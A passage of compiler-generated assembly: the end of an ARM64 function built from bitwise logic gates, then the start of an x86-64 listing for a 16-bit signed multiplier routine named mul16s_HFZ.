bic w8, w8, w9 strb w8, [sp, #885] ldrb w8, [sp, #227] ldrb w9, [sp, #168] bic w8, w8, w9 strb w8, [sp, #880] ldrb w8, [sp, #138] ldrb w9, [sp, #1109] eon w8, w8, w9 strb w8, [sp, #325] ldrb w8, [sp, #138] ldrb w9, [sp, #1109] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #334] ldrb w8, [sp, #337] ldrb w9, [sp, #1109] bic w8, w8, w9 strb w8, [sp, #22] ldrb w8, [sp, #380] ldrb w9, [sp, #1022] eon w8, w8, w9 strb w8, [sp, #797] ldrb w8, [sp, #380] ldrb w9, [sp, #1022] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #992] ldrb w8, [sp, #615] ldrb w9, [sp, #1022] bic w8, w8, w9 strb w8, [sp, #898] ldrb w8, [sp, #279] ldrb w9, [sp, #385] eon w8, w8, w9 strb w8, [sp, #386] ldrb w8, [sp, #279] ldrb w9, [sp, #385] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1014] ldrb w8, [sp, #731] ldrb w9, [sp, #385] bic w8, w8, w9 strb w8, [sp, #1015] ldrb w8, [sp, #498] ldrb w9, [sp, #1012] eon w8, w8, w9 strb w8, [sp, #1011] ldrb w8, [sp, #498] ldrb w9, [sp, #1012] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #473] ldrb w8, [sp, #732] ldrb w9, [sp, #1012] bic w8, w8, w9 strb w8, [sp, #1233] ldrb w8, [sp, #1013] ldrb w9, [sp, #611] eon w8, w8, w9 strb w8, [sp, #443] ldrb w8, [sp, #1013] ldrb w9, [sp, #611] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #712] ldrb w8, [sp, #35] ldrb w9, [sp, #611] bic w8, w8, w9 strb w8, [sp, #714] ldrb w8, [sp, #338] ldrb w9, [sp, #317] eon w8, w8, w9 strb w8, [sp, #318] ldrb w8, [sp, #338] ldrb w9, [sp, #317] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #733] ldrb w8, [sp, #271] ldrb w9, [sp, #317] bic w8, w8, w9 strb w8, [sp, #1117] ldrb w8, [sp, #856] ldrb w9, [sp, #684] eon w8, w8, w9 strb w8, [sp, #1066] ldrb w8, [sp, #337] ldrb w9, [sp, #325] eon w8, w8, w9 strb w8, [sp, #994] ldrb w8, [sp, #1164] ldrb w9, [sp, #492] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1119] ldrb w8, [sp, #466] ldrb w9, [sp, #553] eor w8, w8, w9 strb w8, [sp, #1063] ldrb w8, [sp, #509] ldrb w9, [sp, #510] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #516] ldrb w8, [sp, #995] ldrb w9, [sp, #997] eor w8, w8, w9 strb w8, [sp, #309] ldrb w8, [sp, #986] ldrb w9, [sp, #1229] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1024] ldrb w8, [sp, #483] ldrb w9, [sp, #855] eor w8, w8, w9 strb w8, [sp, #686] ldrb w8, [sp, #655] ldrb w9, [sp, #899] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #126] ldrb w8, [sp, #361] ldrb w9, [sp, #1230] eon w8, w8, w9 strb w8, [sp, #1215] ldrb w8, [sp, #598] ldrb w9, [sp, #930] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #557] ldrb w8, [sp, #227] ldrb w9, [sp, #650] eor w8, w8, w9 strb w8, [sp, #502] ldrb w8, [sp, #759] ldrb w9, [sp, #885] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #189] ldrb w8, [sp, #22] ldrb w9, [sp, #334] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1236] ldrb w8, [sp, #615] ldrb w9, [sp, #797] eor w8, w8, w9 strb w8, [sp, #332] ldrb w8, [sp, #898] ldrb w9, [sp, #992] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #980] ldrb w8, [sp, #731] ldrb w9, [sp, #386] eor w8, w8, w9 strb w8, [sp, #1115] ldrb w8, [sp, #1015] ldrb w9, [sp, #1014] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1030] ldrb w8, [sp, #732] ldrb w9, [sp, #1011] eor w8, w8, w9 strb w8, [sp, #1010] ldrb w8, [sp, #1210] ldrb w9, [sp, #473] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #472] ldrb w8, [sp, #35] ldrb w9, [sp, #443] eor w8, w8, w9 strb w8, [sp, #314] ldrb w8, [sp, #217] ldrb w9, [sp, #712] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #711] ldrb w8, [sp, #271] ldrb w9, [sp, #318] eor w8, w8, w9 strb w8, [sp, #1214] ldrb w8, [sp, #720] ldrb w9, [sp, #733] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #734] ldrb w8, [sp, #827] ldrb w9, [sp, #1066] eor w8, w8, w9 strb w8, [sp, #729] ldrb w8, [sp, #730] ldrb w9, [sp, #729] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #469] ldrb w9, [sp, #920] ldrb w8, [sp, #1119] bic w8, w8, w9 strb w8, [sp, #303] ldrb w8, [sp, #290] ldrb w9, [sp, #1063] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #513] ldrb w9, [sp, #928] ldrb w8, [sp, #516] bic w8, w8, w9 strb w8, [sp, #504] ldrb w8, [sp, #870] ldrb w9, [sp, #309] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #752] ldrb w9, [sp, #322] ldrb w8, [sp, #1024] bic w8, w8, w9 strb w8, [sp, #1068] ldrb w8, [sp, #304] ldrb w9, [sp, #686] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #149] ldrb w9, [sp, #691] ldrb w8, [sp, #126] bic w8, w8, w9 strb w8, [sp, #857] ldrb w8, [sp, #1043] ldrb w9, [sp, #1215] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1175] ldrb w9, [sp, #125] ldrb w8, [sp, #557] bic w8, w8, w9 strb w8, [sp, #537] ldrb w8, [sp, #127] ldrb w9, [sp, #502] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #424] ldrb w9, [sp, #880] ldrb w8, [sp, #189] bic w8, w8, w9 strb w8, [sp, #313] ldrb w9, [sp, #336] ldrb w8, [sp, #1236] bic w8, w8, w9 strb w8, [sp, #339] ldrb w8, [sp, #331] ldrb w9, [sp, #332] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #985] ldrb w9, [sp, #388] ldrb w8, [sp, #980] bic w8, w8, w9 strb w8, [sp, #981] ldrb w8, [sp, #387] ldrb w9, [sp, #1115] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #115] ldrb w9, [sp, #1016] ldrb w8, [sp, #1030] bic w8, w8, w9 strb w8, [sp, #1061] ldrb w8, [sp, #1009] ldrb w9, [sp, #1010] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #445] ldrb w9, [sp, #1233] ldrb w8, [sp, #472] bic w8, w8, w9 strb w8, [sp, #1029] ldrb w8, [sp, #832] ldrb w9, [sp, #314] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1071] ldrb w9, [sp, #714] ldrb w8, [sp, #711] bic w8, w8, w9 strb w8, [sp, #710] ldrb w8, [sp, #700] ldrb w9, [sp, #1214] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1202] ldrb w9, [sp, #1117] ldrb w8, [sp, #734] bic w8, w8, w9 strb w8, [sp, #1195] ldrb w8, [sp, #730] ldrb w9, [sp, #1195] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1070] ldrb w8, [sp, #729] ldrb w9, [sp, #1195] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #378] ldrb w8, [sp, #290] ldrb w9, [sp, #303] eon w8, w8, w9 strb w8, [sp, #300] ldrb w8, [sp, #290] ldrb w9, [sp, #303] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #514] ldrb w8, [sp, #1063] ldrb w9, [sp, #303] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #740] ldrb w8, [sp, #870] ldrb w9, [sp, #504] eon w8, w8, w9 strb w8, [sp, #763] ldrb w8, [sp, #870] ldrb w9, [sp, #504] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #796] ldrb w8, [sp, #309] ldrb w9, [sp, #504] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #122] ldrb w8, [sp, #304] ldrb w9, [sp, #1068] eon w8, w8, w9 strb w8, [sp, #276] ldrb w8, [sp, #304] ldrb w9, [sp, #1068] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #399] ldrb w8, [sp, #686] ldrb w9, [sp, #1068] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #280] ldrb w8, [sp, #1043] ldrb w9, [sp, #857] eon w8, w8, w9 strb w8, [sp, #854] ldrb w8, [sp, #1043] ldrb w9, [sp, #857] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #929] ldrb w8, [sp, #1215] ldrb w9, [sp, #857] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #129] ldrb w8, [sp, #127] ldrb w9, [sp, #537] eon w8, w8, w9 strb w8, [sp, #919] ldrb w8, [sp, #127] ldrb w9, [sp, #537] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #565] ldrb w8, [sp, #502] ldrb w9, [sp, #537] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #563] ldrb w8, [sp, #757] ldrb w9, [sp, #313] eon w8, w8, w9 strb w8, [sp, #412] ldrb w8, [sp, #757] ldrb w9, [sp, #313] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #661] ldrb w8, [sp, #756] ldrb w9, [sp, #313] bic w8, w8, w9 strb w8, [sp, #663] ldrb w8, [sp, #331] ldrb w9, [sp, #339] eon w8, w8, w9 strb w8, [sp, #965] ldrb w8, [sp, #331] ldrb w9, [sp, #339] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #873] ldrb w8, [sp, #332] ldrb w9, [sp, #339] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #219] ldrb w8, [sp, #387] ldrb w9, [sp, #981] eon w8, w8, w9 strb w8, [sp, #982] ldrb w8, [sp, #387] ldrb w9, [sp, #981] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #116] ldrb w8, [sp, #1115] ldrb w9, [sp, #981] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #114] ldrb w8, [sp, #1009] ldrb w9, [sp, #1061] eon w8, w8, w9 strb w8, [sp, #112] ldrb w8, [sp, #1009] ldrb w9, [sp, #1061] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1073] ldrb w8, [sp, #1010] ldrb w9, [sp, #1061] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #585] ldrb w8, [sp, #832] ldrb w9, [sp, #1029] eon w8, w8, w9 strb w8, [sp, #474] ldrb w8, [sp, #832] ldrb w9, [sp, #1029] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1072] ldrb w8, [sp, #314] ldrb w9, [sp, #1029] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #118] ldrb w8, [sp, #700] ldrb w9, [sp, #710] eon w8, w8, w9 strb w8, [sp, #709] ldrb w8, [sp, #700] ldrb w9, [sp, #710] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1116] ldrb w8, [sp, #1214] ldrb w9, [sp, #710] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1113] ldrb w8, [sp, #730] ldrb w9, [sp, #1195] eon w8, w8, w9 strb w8, [sp, #281] ldrb w8, [sp, #332] ldrb w9, [sp, #965] eor w8, w8, w9 strb w8, [sp, #215] ldrb w8, [sp, #469] ldrb w9, [sp, #1070] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #989] ldrb w8, [sp, #1063] ldrb w9, [sp, #300] eon w8, w8, w9 strb w8, [sp, #301] ldrb w8, [sp, #513] ldrb w9, [sp, #514] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #515] ldrb w8, [sp, #309] ldrb w9, [sp, #763] eon w8, w8, w9 strb w8, [sp, #519] ldrb w8, [sp, #752] ldrb w9, [sp, #796] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #656] ldrb w8, [sp, #686] ldrb w9, [sp, #276] eon w8, w8, w9 strb w8, [sp, #1110] ldrb w8, [sp, #149] ldrb w9, [sp, #399] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #816] ldrb w8, [sp, #1215] ldrb w9, [sp, #854] eon w8, w8, w9 strb w8, [sp, #777] ldrb w8, [sp, #1175] ldrb w9, [sp, #929] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #610] ldrb w8, [sp, #502] ldrb w9, [sp, #919] eon w8, w8, w9 strb w8, [sp, #560] ldrb w8, [sp, #424] ldrb w9, [sp, #565] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #564] ldrb w8, [sp, #756] ldrb w9, [sp, #412] eor w8, w8, w9 strb w8, [sp, #988] ldrb w8, [sp, #660] ldrb w9, [sp, #661] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1203] ldrb w8, [sp, #985] ldrb w9, [sp, #873] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #987] ldrb w8, [sp, #1115] ldrb w9, [sp, #982] eon w8, w8, w9 strb w8, [sp, #983] ldrb w8, [sp, #115] ldrb w9, [sp, #116] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #621] ldrb w8, [sp, #1010] ldrb w9, [sp, #112] eon w8, w8, w9 strb w8, [sp, #113] ldrb w8, [sp, #445] ldrb w9, [sp, #1073] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1020] ldrb w8, [sp, #314] ldrb w9, [sp, #474] eon w8, w8, w9 strb w8, [sp, #477] ldrb w8, [sp, #1071] ldrb w9, [sp, #1072] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1078] ldrb w8, [sp, #1214] ldrb w9, [sp, #709] eon w8, w8, w9 strb w8, [sp, #708] ldrb w8, [sp, #1202] ldrb w9, [sp, #1116] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #288] ldrb w8, [sp, #729] ldrb w9, [sp, #281] eon w8, w8, w9 strb w8, [sp, #165] ldrb w9, [sp, #378] ldrb w8, [sp, #989] bic w8, w8, w9 strb w8, [sp, #119] ldrb w9, [sp, #740] ldrb w8, [sp, #515] bic w8, w8, w9 strb w8, [sp, #471] ldrb w9, [sp, #122] ldrb w8, [sp, #656] bic w8, w8, w9 strb w8, [sp, #315] ldrb w9, [sp, #280] ldrb w8, [sp, #816] bic w8, w8, w9 strb w8, [sp, #142] ldrb w9, [sp, #129] ldrb w8, [sp, #610] bic w8, w8, w9 strb w8, [sp, #586] ldrb w9, [sp, #563] ldrb w8, [sp, #564] bic w8, w8, w9 strb w8, [sp, #567] ldrb w9, [sp, #663] ldrb w8, [sp, #1203] bic w8, w8, w9 strb w8, [sp, #501] ldrb w9, [sp, #219] ldrb w8, [sp, #987] bic w8, w8, w9 strb w8, [sp, #622] ldrb w9, [sp, #114] ldrb w8, [sp, #621] bic w8, w8, w9 strb w8, [sp, #263] ldrb w9, [sp, #585] ldrb w8, [sp, #1020] bic w8, w8, w9 strb w8, [sp, #511] ldrb w9, [sp, #118] ldrb w8, [sp, #1078] bic w8, w8, w9 strb w8, [sp, #1067] ldrb w9, [sp, #1113] ldrb w8, [sp, #288] bic w8, w8, w9 strb w8, [sp, #1123] ldrb w8, [sp, #983] ldrb w9, [sp, #622] eor w8, w8, w9 strb w8, [sp, #599] ldrb w8, [sp, #165] ldrb w9, [sp, #1123] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #862] ldrb w8, [sp, #301] ldrb w9, [sp, #119] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #798] ldrb w8, [sp, #519] ldrb w9, [sp, #471] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #327] ldrb w8, [sp, #1110] ldrb w9, [sp, #315] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #495] ldrb w8, [sp, #777] ldrb w9, [sp, #142] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #925] ldrb w8, [sp, #560] ldrb w9, [sp, #586] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #569] ldrb w8, [sp, #988] ldrb w9, [sp, #567] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #496] ldrb w8, [sp, #662] ldrb w9, [sp, #501] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #307] ldrb w8, [sp, #983] ldrb w9, [sp, #622] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #120] ldrb w8, [sp, #113] ldrb w9, [sp, #263] eon w8, w8, w9 strb w8, [sp, #283] ldrb w8, [sp, #113] ldrb w9, [sp, #263] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #213] ldrb w8, [sp, #477] ldrb w9, [sp, #511] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1107] ldrb w8, [sp, #708] ldrb w9, [sp, #1067] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #76] ldrb w8, [sp, #283] ldrb w9, [sp, #120] eon w8, w8, w9 strb w8, [sp, #222] ldrb w8, [sp, #1034] ldrb w9, [sp, #307] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #657] ldrb w9, [sp, #113] ldrb w8, [sp, #120] bic w8, w8, w9 strb w8, [sp, #310] ldrb w9, [sp, #263] ldrb w8, [sp, #120] bic w8, w8, w9 strb w8, [sp, #1162] ldrb w8, [sp, #213] ldrb w9, [sp, #310] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #381] ldrb w9, [sp, #1162] ldrb w8, [sp, #381] bic w8, w8, w9 strb w8, [sp, #716] ldrb w8, [sp, #511] ldrb w9, [sp, #716] eon w8, w8, w9 strb w8, [sp, #717] ldrb w8, [sp, #511] ldrb w9, [sp, #716] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1074] ldrb w8, [sp, #477] ldrb w9, [sp, #716] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1080] ldrb w8, [sp, #477] ldrb w9, [sp, #717] eor w8, w8, w9 strb w8, [sp, #494] ldrb w8, [sp, #1107] ldrb w9, [sp, #1074] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1075] ldrb w9, [sp, #1080] ldrb w8, [sp, #1075] bic w8, w8, w9 strb w8, [sp, #1076] ldrb w8, [sp, #1067] ldrb w9, [sp, #1076] eon w8, w8, w9 strb w8, [sp, #1077] ldrb w8, [sp, #1067] ldrb w9, [sp, #1076] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1150] ldrb w8, [sp, #708] ldrb w9, [sp, #1076] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #323] ldrb w8, [sp, #708] ldrb w9, [sp, #1077] eor w8, w8, w9 strb w8, [sp, #750] ldrb w8, [sp, #76] ldrb w9, [sp, #1150] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1147] ldrb w9, [sp, #323] ldrb w8, [sp, #1147] bic w8, w8, w9 strb w8, [sp, #1199] ldrb w8, [sp, #1123] ldrb w9, [sp, #1199] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #860] ldrb w8, [sp, #165] ldrb w9, [sp, #1199] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #216] ldrb w8, [sp, #1123] ldrb w9, [sp, #1199] eon w8, w8, w9 strb w8, [sp, #376] ldrb w8, [sp, #165] ldrb w9, [sp, #376] eor w8, w8, w9 strb w8, [sp, #685] ldrb w8, [sp, #862] ldrb w9, [sp, #860] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #882] ldrb w9, [sp, #216] ldrb w8, [sp, #882] bic w8, w8, w9 strb w8, [sp, #643] ldrb w8, [sp, #119] ldrb w9, [sp, #643] eon w8, w8, w9 strb w8, [sp, #411] ldrb w8, [sp, #119] ldrb w9, [sp, #643] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1198] ldrb w8, [sp, #301] ldrb w9, [sp, #643] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1056] ldrb w8, [sp, #301] ldrb w9, [sp, #411] eor w8, w8, w9 strb w8, [sp, #73] ldrb w8, [sp, #798] ldrb w9, [sp, #1198] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #379] ldrb w9, [sp, #1056] ldrb w8, [sp, #379] bic w8, w8, w9 strb w8, [sp, #817] ldrb w8, [sp, #471] ldrb w9, [sp, #817] eon w8, w8, w9 strb w8, [sp, #993] ldrb w8, [sp, #471] ldrb w9, [sp, #817] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #861] ldrb w8, [sp, #519] ldrb w9, [sp, #817] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #693] ldrb w8, [sp, #519] ldrb w9, [sp, #993] eor w8, w8, w9 strb w8, [sp, #849] ldrb w8, [sp, #327] ldrb w9, [sp, #861] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1194] ldrb w9, [sp, #693] ldrb w8, [sp, #1194] bic w8, w8, w9 strb w8, [sp, #41] ldrb w8, [sp, #315] ldrb w9, [sp, #41] eon w8, w8, w9 strb w8, [sp, #128] ldrb w8, [sp, #315] ldrb w9, [sp, #41] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #815] ldrb w8, [sp, #1110] ldrb w9, [sp, #41] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #145] ldrb w8, [sp, #1110] ldrb w9, [sp, #128] eor w8, w8, w9 strb w8, [sp, #1205] ldrb w8, [sp, #495] ldrb w9, [sp, #815] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #218] ldrb w9, [sp, #145] ldrb w8, [sp, #218] bic w8, w8, w9 strb w8, [sp, #447] ldrb w8, [sp, #142] ldrb w9, [sp, #447] eon w8, w8, w9 strb w8, [sp, #451] ldrb w8, [sp, #142] ldrb w9, [sp, #447] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #926] ldrb w8, [sp, #777] ldrb w9, [sp, #447] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #924] ldrb w8, [sp, #777] ldrb w9, [sp, #451] eor w8, w8, w9 strb w8, [sp, #1121] ldrb w8, [sp, #925] ldrb w9, [sp, #926] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1177] ldrb w9, [sp, #924] ldrb w8, [sp, #1177] bic w8, w8, w9 strb w8, [sp, #1163] ldrb w8, [sp, #586] ldrb w9, [sp, #1163] eon w8, w8, w9 strb w8, [sp, #704] ldrb w8, [sp, #586] ldrb w9, [sp, #1163] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1021] ldrb w8, [sp, #560] ldrb w9, [sp, #1163] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #566] ldrb w8, [sp, #560] ldrb w9, [sp, #704] eor w8, w8, w9 strb w8, [sp, #1019] ldrb w8, [sp, #569] ldrb w9, [sp, #1021] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #225] ldrb w9, [sp, #566] ldrb w8, [sp, #225] bic w8, w8, w9 strb w8, [sp, #226] ldrb w8, [sp, #567] ldrb w9, [sp, #226] eon w8, w8, w9 strb w8, [sp, #415] ldrb w8, [sp, #567] ldrb w9, [sp, #226] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1124] ldrb w8, [sp, #988] ldrb w9, [sp, #226] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #499] ldrb w8, [sp, #988] ldrb w9, [sp, #415] eor w8, w8, w9 strb w8, [sp, #718] ldrb w8, [sp, #496] ldrb w9, [sp, #1124] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #491] ldrb w9, [sp, #499] ldrb w8, [sp, #491] bic w8, w8, w9 strb w8, [sp, #1122] ldrb w8, [sp, #501] ldrb w9, [sp, #1122] eon w8, w8, w9 strb w8, [sp, #488] ldrb w8, [sp, #501] ldrb w9, [sp, #1122] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #342] ldrb w8, [sp, #662] ldrb w9, [sp, #1122] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1035] ldrb w8, [sp, #662] ldrb w9, [sp, #488] eor w8, w8, w9 strb w8, [sp, #1112] ldrb w8, [sp, #657] ldrb w9, [sp, #342] bic w8, w8, w9 strb w8, [sp, #666] ldrb w9, [sp, #1035] ldrb w8, [sp, #666] bic w8, w8, w9 strb w8, [sp, #642] ldrb w9, [sp, #210] ldrb w8, [sp, #1037] lsl w8, w8, #1 orr w8, w8, w9 ldrb w9, [sp, #897] orr w8, w8, w9, lsl #2 ldrb w9, [sp, #464] orr w8, w8, w9, lsl #3 ldrb w9, [sp, #1196] orr w8, w8, w9, lsl #4 ldrb w9, [sp, #906] orr w8, w8, w9, lsl #5 ldrb w9, [sp, #794] orr w8, w8, w9, lsl #6 ldrb w9, [sp, #326] orr w8, w8, w9, lsl #7 ldrb w9, [sp, #1046] orr w8, w8, w9, lsl #8 ldrb w9, [sp, #762] orr w8, w8, w9, lsl #9 ldrb w9, [sp, #162] orr w8, w8, w9, lsl #10 ldrb w9, [sp, #85] orr w8, w8, w9, lsl #11 ldrb w9, [sp, #652] orr w8, w8, w9, lsl #12 ldrb w9, [sp, #975] orr w8, w8, w9, lsl #13 ldrb w9, [sp, #1204] orr w8, w8, w9, lsl #14 ldrb w9, [sp, #1023] orr w8, w8, w9, lsl #15 ldrb w9, [sp, #864] orr w8, w8, w9, lsl #16 ldrb w9, [sp, #994] orr w8, w8, w9, lsl #17 ldrb w9, [sp, #215] orr w8, w8, w9, lsl #18 ldrb w9, [sp, #599] orr w8, w8, w9, lsl #19 ldrb w9, [sp, #222] orr w8, w8, w9, lsl #20 ldrb w9, [sp, #494] orr w8, w8, w9, lsl #21 ldrb w9, [sp, #750] orr w8, w8, w9, lsl #22 ldrb w9, [sp, #685] orr w8, w8, w9, lsl #23 ldrb w9, [sp, #73] orr w8, w8, w9, lsl #24 ldrb w9, [sp, #849] orr w8, w8, w9, lsl #25 ldrb w9, [sp, #1205] orr w8, w8, w9, lsl #26 ldrb w9, [sp, #1121] orr w8, w8, w9, lsl #27 ldrb w9, [sp, #1019] orr w8, w8, w9, lsl #28 ldrb w9, [sp, #718] orr w8, w8, w9, lsl #29 ldrb w9, [sp, #1112] orr w8, w8, w9, lsl #30 ldrb w9, [sp, #642] orr w8, w8, w9, lsl #31 str w8, [sp, #1240] ldr w0, [sp, #1240] add sp, sp, #1248 ldp x28, x27, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _mul16s_HFZ ## -- Begin function mul16s_HFZ .p2align 4, 0x90 _mul16s_HFZ: ## @mul16s_HFZ .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $1112, %rsp ## imm = 0x458 movw %si, %ax movw %di, %cx movw %cx, -2(%rbp) movw %ax, -4(%rbp) movb $0, -1038(%rbp) movb $0, -211(%rbp) movb $0, -351(%rbp) movb $0, -784(%rbp) movb $0, -52(%rbp) movb $0, -342(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -454(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -426(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -422(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1238(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -10(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -420(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -421(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -958(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -487(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -493(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1107(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al 